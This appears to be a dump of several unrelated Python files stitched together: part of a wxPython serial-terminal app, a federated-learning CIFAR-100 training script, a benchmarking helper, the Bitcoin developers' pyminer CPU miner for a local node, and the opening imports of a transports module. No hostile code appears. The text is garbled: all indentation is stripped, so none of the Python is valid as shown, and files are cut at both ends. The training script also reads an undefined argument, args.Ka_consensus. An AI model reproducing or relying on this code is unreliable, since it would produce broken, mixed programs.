# First we create and fill the info object
info = wx.AboutDialogInfo()
info.Name = AppTitle
info.Version = AppVersion
info.Copyright = "Copywrong All Lefts Unreserved."
info.Description = wordwrap(
'\nMyTerm offers a great solution for RS232 serial port communication.'
'\n\nIts other features include detecting the available serial ports, '
'receiving data from serial ports and viewing it as ASCII text or in hexadecimal format, '
'and optionally echoing the transmitted data locally.',
350, wx.ClientDC(self.frame))
info.WebSite = ("https://github.com/gamesun/MyTerm#myterm", "MyTerm Home Page")
info.Developers = [ "sun.yt" ]
info.License = wordwrap("(C) 2013 Programmers and Coders Everywhere", 500, wx.ClientDC(self.frame))
info.Icon = icon32.geticon32Icon()
# Then we call wx.AboutBox giving it that info object
wx.AboutBox(info)
def OnExitApp(self, evt = None):
self.frame.Close(True) # send EVT_CLOSE
print 'exit'
def Cleanup(self, evt = None):
self.frame.Destroy()
self.OnClosePort()
# for t in threading.enumerate():
# print t.getName()
if hasattr(self, 'thread'):
if self.thread is not None:
assert not self.thread.is_alive(), "the thread should be dead but isn't!"
# self.threadCommunicate.terminate()
def ThreadSetInfo(data):
serialport.write('\n')
for d in data[0]:
time.sleep(0.15)
serialport.write('settime %d %s\n' % (d[0], d[1]))
for d in data[1]:
time.sleep(0.15)
serialport.write('setcnt %d %s\n' % (d[0], d[1]))
for d in data[2]:
time.sleep(0.15)
serialport.write('setvol %d %s\n' % (d[0], d[1]))
if __name__ == '__main__':
app = MyApp(0)
app.MainLoop()
|
federated_learning_keras_PS_CIFAR100.py
|
from DataSets import CIFARData
from consensus.consensus_v2 import CFA_process
from consensus.parameter_server import Parameter_Server
# best use with PS active
# from ReplayMemory import ReplayMemory
import numpy as np
import os
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras import models
import argparse
import warnings
import glob
import datetime
import scipy.io as sio
# import multiprocessing
import threading
import math
from matplotlib.pyplot import pause
import time
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser()
parser.add_argument('-resume', default=0, help="set 1 to resume from a previous simulation, 0 to start from the beginning", type=float)
parser.add_argument('-PS', default=1, help="set 1 to enable PS server and FedAvg, set 0 to disable PS", type=float)
parser.add_argument('-consensus', default=0, help="set 1 to enable consensus, set 0 to disable", type=float)
parser.add_argument('-mu', default=0.001, help="sets the learning rate for all setups", type=float)
parser.add_argument('-eps', default=1, help="sets the mixing parameters for model averaging (CFA)", type=float)
parser.add_argument('-target', default=0.5, help="sets the target loss to stop federation", type=float)
parser.add_argument('-K', default=30, help="sets the number of network devices", type=int)
parser.add_argument('-Ka', default=20, help="sets the number of active devices per round in FA (<= K)", type=int)
parser.add_argument('-N', default=1, help="sets the max. number of neighbors per device per round in CFA", type=int)
parser.add_argument('-samp', default=500, help="sets the number of samples per device", type=int)
parser.add_argument('-noniid_assignment', default=0, help=" set 0 for iid assignment, 1 for non-iid random", type=int)
parser.add_argument('-run', default=0, help=" set the run id", type=int)
parser.add_argument('-random_data_distribution', default=0, help=" set 0 for fixed distribution, 1 for time-varying", type=int)
parser.add_argument('-batches', default=5, help="sets the number of batches per learning round", type=int)
parser.add_argument('-batch_size', default=100, help="sets the batch size per learning round", type=int)
parser.add_argument('-graph', default=6, help="sets the input graph: 0 for default graph, >0 uses the input graph in vGraph.mat, and choose one graph from the available adjacency matrices", type=int)
parser.add_argument('-modelselection', default=0, help="sets the model: 0 for vgg-1", type=int)
args = parser.parse_args()
devices = args.K # NUMBER OF DEVICES
active_devices_per_round = args.Ka
n_outputs = 100 # 100 classes (CIFAR-100)
max_epochs = 1000
validation_train = 50000 # training dataset size (CIFAR-100)
validation_test = 10000 # test dataset size, used for validation
condition = args.modelselection
# set an arbitrary optimizer, here Adam is used
# optimizer = keras.optimizers.Adam(learning_rate=args.mu, clipnorm=1.0)
optimizer = keras.optimizers.SGD(learning_rate=args.mu, momentum=0.9)
if args.consensus == 1:
federated = True
parameter_server = False
elif args.PS == 1:
federated = False
parameter_server = True
else: # CL: CENTRALIZED LEARNING ON DEVICE 0 (DATA CENTER)
federated = False
parameter_server = False
if active_devices_per_round > devices:
active_devices_per_round = devices
target_loss = args.target
# Configuration parameters for the whole setup
seed = 42
# batch_size = 5 # Size of batch taken from replay buffer
batch_size = args.batch_size
number_of_batches = args.batches
training_set_per_device = args.samp # NUMBER OF TRAINING SAMPLES PER DEVICE
if (training_set_per_device > validation_train/args.K):
training_set_per_device = math.floor(validation_train/args.K)
print(training_set_per_device)
if batch_size > training_set_per_device:
batch_size = training_set_per_device
# if batch_size*number_of_batches > training_set_per_device:
# number_of_batches = math.floor(training_set_per_device/batch_size)
# number_of_batches = int(training_set_per_device/batch_size)
# number_of_batches = args.batches
number_of_batches_for_validation = int(validation_test/batch_size)
print("Number of batches for learning {}".format(number_of_batches))
max_lag = number_of_batches*2 # consensus max delay: at most 2 epochs
refresh_server = 1 # refresh server updates (in sec)
validation_start = 1 # start validation in epochs
# Using huber loss for stability
loss_function = keras.losses.Huber()
# tf.keras.regularizers.l2(l2=0.01, **kwargs)
def get_noniid_data(total_training_size, devices, batch_size):
samples = np.random.random_integers(batch_size, total_training_size - batch_size * (devices - 1),
devices) # create random numbers
samples = samples / np.sum(samples, axis=0) * total_training_size # force them to sum to totals
# Ignore the following if you don't need integers
samples = np.round(samples) # transform them into integers
remainings = total_training_size - np.sum(samples, axis=0) # check if there are corrections to be done
step = 1 if remainings > 0 else -1
while remainings != 0:
i = np.random.randint(devices)
if samples[i] + step >= 0:
samples[i] += step
remainings -= step
return samples
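# Example (values are illustrative): get_noniid_data(2000, 4, 100) returns an
# array of 4 non-negative integers summing exactly to 2000; individual entries
# can still drop below batch_size, which is why the caller redraws until
# np.min(samples) >= batch_size.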
####
def preprocess_observation(obs, batch_size):
img = obs # CIFAR images are already 32x32, no cropping or downsizing needed
img = (img).astype(np.float)
return img.reshape(batch_size, 32, 32, 3)
def create_q_model():
# VGG-style classifier; the number of conv blocks (1, 2 or 3) is selected by 'condition'
inputs = layers.Input(shape=(32, 32, 3,))
if condition == 0:
# VGG 1 BLOCK
layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(inputs)
layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(layer1)
layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2)
layer4 = layers.Flatten()(layer3)
layer5 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer4)
classification = layers.Dense(n_outputs, activation="linear")(layer5)
elif condition == 1:
# VGG 2 BLOCK
layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
inputs)
layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer1)
layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2)
layer4 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer3)
layer5 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer4)
layer6 = layers.MaxPooling2D(pool_size=(2, 2))(layer5)
layer7 = layers.Flatten()(layer6)
layer8 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer7)
classification = layers.Dense(n_outputs, activation="linear")(layer8)
else:
# VGG 3 BLOCK
layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
inputs)
layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer1)
layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2)
layer4 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer3)
layer5 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer4)
layer6 = layers.MaxPooling2D(pool_size=(2, 2))(layer5)
layer7 = layers.Conv2D(128, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer6)
layer8 = layers.Conv2D(128, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer7)
layer9 = layers.MaxPooling2D(pool_size=(2, 2))(layer8)
layer10 = layers.Flatten()(layer9)
layer11 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer10)
classification = layers.Dense(n_outputs, activation="linear")(layer11)
# Convolutions
# layer1 = layers.Conv2D(32, 8, strides=4, activation="relu")(inputs)
# layer2 = layers.Conv2D(64, 4, strides=2, activation="relu")(layer1)
# layer3 = layers.Conv2D(64, 3, strides=1, activation="relu")(layer2)
#
# layer4 = layers.Flatten()(layer3)
#
# layer5 = layers.Dense(512, activation="relu")(layer4)
# classification = layers.Dense(n_outputs, activation="linear")(layer5)
return keras.Model(inputs=inputs, outputs=classification)
def processParameterServer(devices, active_devices_per_round, federated, refresh_server=1):
model_global = create_q_model()
model_parameters_initial = np.asarray(model_global.get_weights())
parameter_server = Parameter_Server(devices, model_parameters_initial, active_devices_per_round)
global_target_model = 'results/model_global.npy'
np.save(global_target_model, model_parameters_initial)
pause(5) # wait for neighbors
while True:
pause(refresh_server) # refresh global model on every xx seconds
np.save(global_target_model, parameter_server.federated_target_weights_aggregation(epoch=0, aggregation_type=0))
fileList = glob.glob('*.mat', recursive=False)
if len(fileList) == devices:
# stop the server
break
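# File-system based coordination: the server periodically overwrites
# results/model_global.npy with the aggregated model, each device polls that
# file after its local update, and the server stops once every device has
# written its final .mat result file to the working directory.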
# execute for each deployed device
def processData(device_index, start_samples, samples, federated, full_data_size, number_of_batches, parameter_server, sample_distribution):
pause(5) # PS server (if any) starts first
checkpointpath1 = 'results/model{}.h5'.format(device_index)
outfile = 'results/dump_train_variables{}.npz'.format(device_index)
outfile_models = 'results/dump_train_model{}.npy'.format(device_index)
global_model = 'results/model_global.npy'
np.random.seed(1)
tf.random.set_seed(1) # common initialization
learning_rate = args.mu
learning_rate_local = learning_rate
B = np.ones((devices, devices)) - tf.one_hot(np.arange(devices), devices)
Probabilities = B[device_index, :]/(devices - 1)
training_signal = False
# check for backup variables on start
if os.path.isfile(checkpointpath1):
train_start = False
# backup the model and the model target
model = models.load_model(checkpointpath1)
data_history = []
label_history = []
local_model_parameters = np.load(outfile_models, allow_pickle=True)
model.set_weights(local_model_parameters.tolist())
dump_vars = np.load(outfile, allow_pickle=True)
frame_count = dump_vars['frame_count']
epoch_loss_history = dump_vars['epoch_loss_history'].tolist()
running_loss = np.mean(epoch_loss_history[-5:])
epoch_count = dump_vars['epoch_count']
else:
train_start = True
model = create_q_model()
data_history = []
label_history = []
frame_count = 0
# Experience replay buffers
epoch_loss_history = []
epoch_count = 0
running_loss = math.inf
training_end = False
# create a data object (here CIFAR-100 data)
data_handle = CIFARData(device_index, start_samples, samples, full_data_size, args.random_data_distribution)
# create a consensus object
cfa_consensus = CFA_process(devices, device_index, args.N)
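# Main loop for this device: accumulate `number_of_batches` batches, run a local
# gradient update, then either mix weights with a random neighbor (consensus/CFA),
# pull the aggregated model from the parameter server, or keep training alone
# (centralized baseline), and finally validate against the test set.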
while True: # Run until solved
# collect 1 batch
frame_count += 1
obs, labels = data_handle.getTrainingData(batch_size)
data_batch = preprocess_observation(obs, batch_size)
# Save data and labels in the current learning session
data_history.append(data_batch)
label_history.append(labels)
# Local learning update every "number of batches" batches
if frame_count % number_of_batches == 0 and not training_signal:
epoch_count += 1
for i in range(number_of_batches):
data_sample = np.array(data_history[i])
label_sample = np.array(label_history[i])
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
with tf.GradientTape() as tape:
# Train the model on data samples
classes = model(data_sample)
# Apply the masks
class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1)
# Calculate loss
loss = loss_function(label_sample, class_v)
# Backpropagation
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
del data_history
del label_history
data_history = []
label_history = []
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
# Consensus round
# update local model
cfa_consensus.update_local_model(model_weights)
# neighbor = cfa_consensus.get_connectivity(device_index, args.N, devices) # fixed neighbor
# neighbor = np.random.choice(np.arange(devices), args.N, p=Probabilities, replace=False) # choose neighbor
neighbor = np.random.choice(np.arange(devices), args.N, replace=False) # choose neighbor
while device_index in neighbor: # redraw if the device picked itself
neighbor = np.random.choice(np.arange(devices), args.N, replace=False)
if not train_start:
if federated and not training_signal:
eps_c = 1 / (args.N + 1)
# apply consensus for model parameter
print("Consensus from neighbor {} for device {}, local loss {:.2f}".format(neighbor, device_index,
loss.numpy()))
model.set_weights(cfa_consensus.federated_weights_computing(neighbor, args.N, frame_count, eps_c, max_lag))
if cfa_consensus.getTrainingStatusFromNeightbor():
# a neighbor completed the training, with loss < target, transfer learning is thus applied (the device will copy and reuse the same model)
training_signal = True # stop local learning, just do validation
else:
print("Warm up")
train_start = False
# check if parameter server is enabled
stop_aggregation = False
if parameter_server:
pause(refresh_server)
while not os.path.isfile(global_model):
# implementing consensus
print("waiting")
pause(1)
try:
model_global = np.load(global_model, allow_pickle=True)
except:
pause(5)
print("retrying opening global model")
try:
model_global = np.load(global_model, allow_pickle=True)
except:
print("halting aggregation")
stop_aggregation = True
if not stop_aggregation:
# print("updating from global model inside the parmeter server")
for k in range(cfa_consensus.layers):
# model_weights[k] = model_weights[k]+ 0.5*(model_global[k]-model_weights[k])
model_weights[k] = model_global[k]
model.set_weights(model_weights.tolist())
del model_weights
# validation tool for device 'device_index'
if epoch_count > validation_start and frame_count % number_of_batches == 0:
avg_cost = 0.
for i in range(number_of_batches_for_validation):
obs_valid, labels_valid = data_handle.getTestData(batch_size, i)
# obs_valid, labels_valid = data_handle.getRandomTestData(batch_size)
data_valid = preprocess_observation(np.squeeze(obs_valid), batch_size)
data_sample = np.array(data_valid)
label_sample = np.array(labels_valid)
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
classes = model(data_sample)
# Apply the masks
class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1)
# Calculate loss
loss = loss_function(label_sample, class_v)
avg_cost += loss / number_of_batches_for_validation # Training loss
epoch_loss_history.append(avg_cost)
print("Device {} epoch count {}, validation loss {:.2f}".format(device_index, epoch_count,
avg_cost))
# mean loss for last 5 epochs
running_loss = np.mean(epoch_loss_history[-5:])
if running_loss < target_loss or training_signal: # Condition to consider the task solved
print("Solved for device {} at epoch {} with average loss {:.2f} !".format(device_index, epoch_count, running_loss))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, args.Ka, args.N, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size),
dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
samples, devices, number_of_batches, batch_size,args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if epoch_count > max_epochs: # stop simulation
print("Unsolved for device {} at epoch {}!".format(device_index, epoch_count))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, args.Ka, args.N, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size),
dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
samples, devices, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if __name__ == "__main__":
# GPU memory growth limitation
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
try:
# Currently, memory growth needs to be the same across GPUs
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
logical_gpus = tf.config.experimental.list_logical_devices('GPU')
print(len(gpus), "Physical GPUs,", len(logical_gpus), "Logical GPUs")
except RuntimeError as e:
# Memory growth must be set before GPUs have been initialized
print(e)
if args.resume == 0: # clear all files
# DELETE TEMPORARY CACHE FILES
fileList = glob.glob('results/*.npy', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('results/*.h5', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('results/*.npz', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('*.mat', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
# main loop for multiprocessing
t = []
############# enable consensus based federation #######################
# federated = False
# federated = True
########################################################
##################### enable parameter server ##############
# parameter_server = False
server_index = devices
# parameter_server = True
#########################################################
samples = np.zeros(devices) # training samples per device
for id in range(devices):
# samples[id]=math.floor(w[id]*validation_train)
# samples[id] = math.floor(balancing_vect[id]*fraction_training)
samples[id] = training_set_per_device
# samples = int(fraction_training/devices) # training samples per device
######################### Create a non-iid assignment ##########################
if args.noniid_assignment == 1:
total_training_size = training_set_per_device * devices
samples = get_noniid_data(total_training_size, devices, batch_size)
while np.min(samples) < batch_size:
samples = get_noniid_data(total_training_size, devices, batch_size)
#############################################################################
print(samples)
#################################### code testing CL learning (0: data center)
# federated = False
# parameter_server = False
# processData(0, validation_train, federated, validation_train, number_of_batches, parameter_server)
######################################################################################
if federated or parameter_server:
for ii in range(devices):
# position start
if ii == 0:
start_index = 0
else:
start_index = start_index + int(samples[ii-1])
t = threading.Thread(target=processData, args=(ii, start_index, int(samples[ii]), federated, validation_train, number_of_batches, parameter_server, samples))
t.start()
# last process is for the target server
if parameter_server:
print("Target server starting with active devices {}".format(active_devices_per_round))
t = threading.Thread(target=processParameterServer, args=(devices, active_devices_per_round, federated, refresh_server))
t.start()
else: # run centralized learning on device 0 (data center)
processData(0, 0, training_set_per_device*devices, federated, validation_train, number_of_batches, parameter_server, samples)
exit(0)
|
benchmark.py
|
from multiprocessing import Process, Queue
import json
import glob
import inspect
import pandas as pd
def run_with_separate_process(func, *args):
def _process(queue, func, *args):
res = func(*args)
queue.put(res)
q = Queue()
p = Process(target=_process, args=(q, func, *args))
p.start()
p.join()
ret = None if p.exitcode else q.get()
return (ret, p.exitcode)
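# Example (illustrative): run_with_separate_process(pow, 2, 10) returns (1024, 0);
# if func raises, the child exits with a non-zero code and the result is
# (None, exitcode).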
class SaveResults(object):
def __init__(self, fname=None, postfix=''):
if fname is None:
self.fname = self._get_fname(postfix)
else:
self.fname = fname
self.results = []
def _get_fname(self, postfix):
stack = inspect.stack()
print(stack)
assert len(stack) > 2, stack
assert len(stack[-2]) > 3, stack[1]
fname, func = stack[-2][1], stack[-2][3]
fname = fname+'__'+func
if postfix:
fname += '_' + postfix.lower().replace(' ','-')
return fname+'.json'
def add(self, result):
self.results.append(result)
with open(self.fname, 'w') as f:
json.dump(self.results, f, indent=2)
def load_results(fname):
data = pd.DataFrame()
for fn in glob.glob(fname):
with open(fn, 'r') as f:
result = json.load(f)
data = data.append(result)
return data
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
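# Helpers for the getwork byte ordering: bufreverse() byte-swaps each 32-bit
# word and wordreverse() reverses the word order. Miner.work() applies
# bufreverse() to the decoded 'data' field before hashing, and both helpers to
# the resulting hash before comparing it against the target.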
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 21948
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
transports.py
|
from .logging import exception_log, debug
from .types import TCP_CONNECT_TIMEOUT
from .types import TransportConfig
